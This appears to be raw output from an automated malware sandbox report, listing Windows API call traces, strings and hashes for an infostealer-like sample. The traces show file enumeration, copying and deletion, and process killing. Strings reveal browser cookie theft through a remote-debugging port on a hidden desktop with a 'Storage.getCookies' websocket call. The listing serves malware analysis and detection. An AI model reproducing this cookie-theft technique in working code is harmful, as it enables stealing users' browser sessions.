                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01001291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010012B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010012BF
                                • lstrlen.KERNEL32(01024CA8), ref: 010012CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010012E7
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 010012F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0100133A
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100135C
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 01001376
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010013AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 010013D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010013E2
                                • lstrlen.KERNEL32(01021794), ref: 010013ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100140A
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001416
                                • lstrlen.KERNEL32(?), ref: 01001423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001443
                                • lstrcat.KERNEL32(00000000,?), ref: 01001451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100147A
                                • StrCmpCA.SHLWAPI(?,00D6D1B8), ref: 010014A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 010014E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001535
                                • StrCmpCA.SHLWAPI(?,00D6DCF0), ref: 01001552
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001593
                                • lstrcpy.KERNEL32(00000000,?), ref: 010015BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010015E4
                                • StrCmpCA.SHLWAPI(?,00D6D350), ref: 01001602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001633
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001685
                                • StrCmpCA.SHLWAPI(?,00D6D3B0), ref: 010016B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 010016F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001745
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010017BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 010017F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100181C
                                • FindClose.KERNEL32(00000000), ref: 0100182B
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 212b842f2e27cf08d59884fce19a8f4a831e0bd73cab9cb6113c34676f6a93ec
                                • Instruction ID: 31f80e37b1125aed426a14135b0fffc2490a74669b193ffa6b209a6454510756
                                • Opcode Fuzzy Hash: 212b842f2e27cf08d59884fce19a8f4a831e0bd73cab9cb6113c34676f6a93ec
                                • Instruction Fuzzy Hash: CF12977061021A9BEF75EF79DC89AAE7BF8AF04304F04456CF986D7290DB38D9458B90
                                APIs
                                • wsprintfA.USER32 ref: 0100CBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 0100CC13
                                • lstrcat.KERNEL32(?,?), ref: 0100CC5F
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100CC71
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 0100CC8B
                                • wsprintfA.USER32 ref: 0100CCB0
                                • PathMatchSpecA.SHLWAPI(?,00D68900), ref: 0100CCE2
                                • CoInitialize.OLE32(00000000), ref: 0100CCEE
                                  • Part of subcall function 0100CAE0: CoCreateInstance.COMBASE(0101B110,00000000,00000001,0101B100,?), ref: 0100CB06
                                  • Part of subcall function 0100CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0100CB46
                                  • Part of subcall function 0100CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0100CBC9
                                • CoUninitialize.COMBASE ref: 0100CD09
                                • lstrcat.KERNEL32(?,?), ref: 0100CD2E
                                • lstrlen.KERNEL32(?), ref: 0100CD3B
                                • StrCmpCA.SHLWAPI(?,0101CFEC), ref: 0100CD55
                                • wsprintfA.USER32 ref: 0100CD7D
                                • wsprintfA.USER32 ref: 0100CD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 0100CDB0
                                • wsprintfA.USER32 ref: 0100CDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 0100CDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0100CE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 0100CE28
                                • CloseHandle.KERNEL32(00000000), ref: 0100CE33
                                • CloseHandle.KERNEL32(00000000), ref: 0100CE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0100CE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100CE94
                                • FindNextFileA.KERNEL32(?,?), ref: 0100CF8D
                                • FindClose.KERNEL32(?), ref: 0100CF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: 98b8d36ad92c3b26cdadcc6b5b3eff152533aba368ddd1940af0fd7aed181d2b
                                • Instruction ID: 15693f5e8b730f2f1e1aba31339e9eef1a1eef1606044567aacdcff7fb188e84
                                • Opcode Fuzzy Hash: 98b8d36ad92c3b26cdadcc6b5b3eff152533aba368ddd1940af0fd7aed181d2b
                                • Instruction Fuzzy Hash: 23C16171900219AFEB71DF64DC49EEE77B9BF48300F044598FA49A7284DB34AA84CF50
                                APIs
                                • memset.MSVCRT ref: 00FF9790
                                • lstrcat.KERNEL32(?,?), ref: 00FF97A0
                                • lstrcat.KERNEL32(?,?), ref: 00FF97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00FF97C3
                                • memset.MSVCRT ref: 00FF97D7
                                  • Part of subcall function 01013E70: lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01013EA5
                                  • Part of subcall function 01013E70: lstrcpy.KERNEL32(00000000,00D6E3D8), ref: 01013ECF
                                  • Part of subcall function 01013E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00FF134E,?,0000001A), ref: 01013ED9
                                • wsprintfA.USER32 ref: 00FF9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00FF9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00FF9844
                                  • Part of subcall function 010146A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 010146B9
                                  • Part of subcall function 010146A0: Process32First.KERNEL32(00000000,00000128), ref: 010146C9
                                  • Part of subcall function 010146A0: Process32Next.KERNEL32(00000000,00000128), ref: 010146DB
                                  • Part of subcall function 010146A0: StrCmpCA.SHLWAPI(?,?), ref: 010146ED
                                  • Part of subcall function 010146A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 01014702
                                  • Part of subcall function 010146A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 01014711
                                  • Part of subcall function 010146A0: CloseHandle.KERNEL32(00000000), ref: 01014718
                                  • Part of subcall function 010146A0: Process32Next.KERNEL32(00000000,00000128), ref: 01014726
                                  • Part of subcall function 010146A0: CloseHandle.KERNEL32(00000000), ref: 01014731
                                • memset.MSVCRT ref: 00FF9862
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF9878
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF9889
                                • lstrcat.KERNEL32(00000000,01024B60), ref: 00FF989B
                                • memset.MSVCRT ref: 00FF98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00FF98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF9903
                                • StrStrA.SHLWAPI(00000000,00D6ECE8), ref: 00FF9919
                                • lstrcpyn.KERNEL32(012293D0,00000000,00000000), ref: 00FF9938
                                • lstrlen.KERNEL32(?), ref: 00FF994B
                                • wsprintfA.USER32 ref: 00FF995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 00FF9971
                                • memset.MSVCRT ref: 00FF9986
                                • Sleep.KERNEL32(00001388), ref: 00FF99E7
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                  • Part of subcall function 00FF92B0: strlen.MSVCRT ref: 00FF92E1
                                  • Part of subcall function 00FF92B0: strlen.MSVCRT ref: 00FF92FA
                                  • Part of subcall function 00FF92B0: strlen.MSVCRT ref: 00FF9399
                                  • Part of subcall function 00FF92B0: strlen.MSVCRT ref: 00FF93E6
                                  • Part of subcall function 01014740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 01014759
                                  • Part of subcall function 01014740: Process32First.KERNEL32(00000000,00000128), ref: 01014769
                                  • Part of subcall function 01014740: Process32Next.KERNEL32(00000000,00000128), ref: 0101477B
                                  • Part of subcall function 01014740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101479C
                                  • Part of subcall function 01014740: TerminateProcess.KERNEL32(00000000,00000000), ref: 010147AB
                                  • Part of subcall function 01014740: CloseHandle.KERNEL32(00000000), ref: 010147B2
                                  • Part of subcall function 01014740: Process32Next.KERNEL32(00000000,00000128), ref: 010147C0
                                  • Part of subcall function 01014740: CloseHandle.KERNEL32(00000000), ref: 010147CB
                                • CloseDesktop.USER32(?), ref: 00FF9A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 2040986984-1862457068
                                • Opcode ID: 088dba1f927fedc3487e69eee139ecff7a481d2ba0ebcbb13ceed25d74bfe171
                                • Instruction ID: 1b8782e3648f8bc1e34449db39103d102dee2080e595a27d24ac757e8b0de059
                                • Opcode Fuzzy Hash: 088dba1f927fedc3487e69eee139ecff7a481d2ba0ebcbb13ceed25d74bfe171
                                • Instruction Fuzzy Hash: 34916471910218AFDB70DFB4DC89FEE77B8AF58700F504199F609A7194DBB4AA44CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01001291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010012B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010012BF
                                • lstrlen.KERNEL32(01024CA8), ref: 010012CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010012E7
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 010012F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0100133A
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100135C
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 01001376
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010013AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 010013D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 010013E2
                                • lstrlen.KERNEL32(01021794), ref: 010013ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100140A
                                • lstrcat.KERNEL32(00000000,01021794), ref: 01001416
                                • lstrlen.KERNEL32(?), ref: 01001423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001443
                                • lstrcat.KERNEL32(00000000,?), ref: 01001451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100147A
                                • StrCmpCA.SHLWAPI(?,00D6D1B8), ref: 010014A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 010014E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01001535
                                • StrCmpCA.SHLWAPI(?,00D6DCF0), ref: 01001552
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001593
                                • lstrcpy.KERNEL32(00000000,?), ref: 010015BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010015E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 01001796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010017BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 010017F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100181C
                                • FindClose.KERNEL32(00000000), ref: 0100182B
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: a190df74cf76a8fb88f0e4b90bc075d39fd79b9c1c91737055753cddacce32f4
                                • Instruction ID: 35a778b29cd6a4cc7bda32cf7b2bad084a53561c130403b60eb1b27000128885
                                • Opcode Fuzzy Hash: a190df74cf76a8fb88f0e4b90bc075d39fd79b9c1c91737055753cddacce32f4
                                • Instruction Fuzzy Hash: 7CC1A77151021A9BEF72EF78DC89AAE7BF8AF04304F044068F989D7291DB78D945DB90
                                APIs
                                • wsprintfA.USER32 ref: 0100E22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 0100E243
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100E263
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 0100E27D
                                • wsprintfA.USER32 ref: 0100E2A2
                                • StrCmpCA.SHLWAPI(?,0101CFEC), ref: 0100E2B4
                                • wsprintfA.USER32 ref: 0100E2D1
                                  • Part of subcall function 0100EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0100EE12
                                • wsprintfA.USER32 ref: 0100E2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 0100E304
                                • lstrcat.KERNEL32(?,00D6F458), ref: 0100E335
                                • lstrcat.KERNEL32(?,01021794), ref: 0100E347
                                • lstrcat.KERNEL32(?,?), ref: 0100E358
                                • lstrcat.KERNEL32(?,01021794), ref: 0100E36A
                                • lstrcat.KERNEL32(?,?), ref: 0100E37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 0100E394
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100E422
                                • DeleteFileA.KERNEL32(?), ref: 0100E45C
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100E49B
                                • FindClose.KERNEL32(00000000), ref: 0100E4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: d0f7bd821eaa1e72941b98b414998c0f6910b0dde25d24064886ffbd2cae1e51
                                • Instruction ID: 76204be9c96568f02e5292990914a01ac89cf17e976e9dd5ffbd39d44405c138
                                • Opcode Fuzzy Hash: d0f7bd821eaa1e72941b98b414998c0f6910b0dde25d24064886ffbd2cae1e51
                                • Instruction Fuzzy Hash: 3781627190021CABDB71EF64EC49EEE77B9BF44300F004998F64AA7195DB79AA44CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF16E2
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF176C
                                • lstrcat.KERNEL32(00000000), ref: 00FF1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF18FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: eda2a295b3a8f7863a0ebc97a68df4173308676f262c9bf5e842f1e26cac2dcf
                                • Instruction ID: c3bc779e855e600a9719a5f386ff42a82daaca5104c021a97a168a712b1266a8
                                • Opcode Fuzzy Hash: eda2a295b3a8f7863a0ebc97a68df4173308676f262c9bf5e842f1e26cac2dcf
                                • Instruction Fuzzy Hash: 68816C3191021EDBCB31EF64DD89ABE77B8BF14314F141128FA09AB265CB789D41EB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0100DD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0100DD4C
                                • wsprintfA.USER32 ref: 0100DD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 0100DD79
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100DD9C
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 0100DDB6
                                • wsprintfA.USER32 ref: 0100DDD4
                                • DeleteFileA.KERNEL32(?), ref: 0100DE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 0100DDED
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                  • Part of subcall function 0100D980: memset.MSVCRT ref: 0100D9A1
                                  • Part of subcall function 0100D980: memset.MSVCRT ref: 0100D9B3
                                  • Part of subcall function 0100D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100D9DB
                                  • Part of subcall function 0100D980: lstrcpy.KERNEL32(00000000,?), ref: 0100DA0E
                                  • Part of subcall function 0100D980: lstrcat.KERNEL32(?,00000000), ref: 0100DA1C
                                  • Part of subcall function 0100D980: lstrcat.KERNEL32(?,00D6EEB0), ref: 0100DA36
                                  • Part of subcall function 0100D980: lstrcat.KERNEL32(?,?), ref: 0100DA4A
                                  • Part of subcall function 0100D980: lstrcat.KERNEL32(?,00D6D248), ref: 0100DA5E
                                  • Part of subcall function 0100D980: lstrcpy.KERNEL32(00000000,?), ref: 0100DA8E
                                  • Part of subcall function 0100D980: GetFileAttributesA.KERNEL32(00000000), ref: 0100DA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100DE2E
                                • FindClose.KERNEL32(00000000), ref: 0100DE3D
                                • lstrcat.KERNEL32(?,00D6F458), ref: 0100DE66
                                • lstrcat.KERNEL32(?,00D6DB50), ref: 0100DE7A
                                • lstrlen.KERNEL32(?), ref: 0100DE84
                                • lstrlen.KERNEL32(?), ref: 0100DE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100DED2
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: eb3b4cf9dab9f4b7b37959842811e17cdcd83afde077ceb9ae6482574a7d8526
                                • Instruction ID: 108e827fffe6df1aa7037caf8393770374ecb4a7aa720fc18f29438520218171
                                • Opcode Fuzzy Hash: eb3b4cf9dab9f4b7b37959842811e17cdcd83afde077ceb9ae6482574a7d8526
                                • Instruction Fuzzy Hash: 86619171900218ABDB71EFB4EC89AEE77B9BF48300F0045A8F64597285DB38EB54DB50
                                APIs
                                • wsprintfA.USER32 ref: 0100D54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 0100D564
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 0100D584
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 0100D59E
                                • lstrcat.KERNEL32(?,00D6F458), ref: 0100D5E3
                                • lstrcat.KERNEL32(?,00D6F4A8), ref: 0100D5F7
                                • lstrcat.KERNEL32(?,?), ref: 0100D60B
                                • lstrcat.KERNEL32(?,?), ref: 0100D61C
                                • lstrcat.KERNEL32(?,01021794), ref: 0100D62E
                                • lstrcat.KERNEL32(?,?), ref: 0100D642
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100D682
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100D6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0100D737
                                • FindClose.KERNEL32(00000000), ref: 0100D746
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: b344c6c0712f9afa34524ae027330b2e43d5408f00580d20e048a04bfb8ee246
                                • Instruction ID: bd466832aa0ea92f293698f1ec6b47e6bd228a7ad095ea1dc4a910e004f1cc04
                                • Opcode Fuzzy Hash: b344c6c0712f9afa34524ae027330b2e43d5408f00580d20e048a04bfb8ee246
                                • Instruction Fuzzy Hash: 30617471910119ABDF71EFB4DC88AEE77B8BF48304F0044A9E64997241DB38EA54CF90
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: e7db6f78a1d6088dee815bc198d4eed50f15403b9076e644769042e1600e81fe
                                • Instruction ID: 1861ed432b0b6cebeadc947f3a4094a9ea92cb83c49bb5cdf178f9a34f64e625
                                • Opcode Fuzzy Hash: e7db6f78a1d6088dee815bc198d4eed50f15403b9076e644769042e1600e81fe
                                • Instruction Fuzzy Hash: DBA26971E012699FDB20CFA8CC807EDBBB6BF89310F1481A9D548A7255DB785E85CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010023D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010023F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01002402
                                • lstrlen.KERNEL32(\*.*), ref: 0100240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 01002436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01002486
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                 • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmp
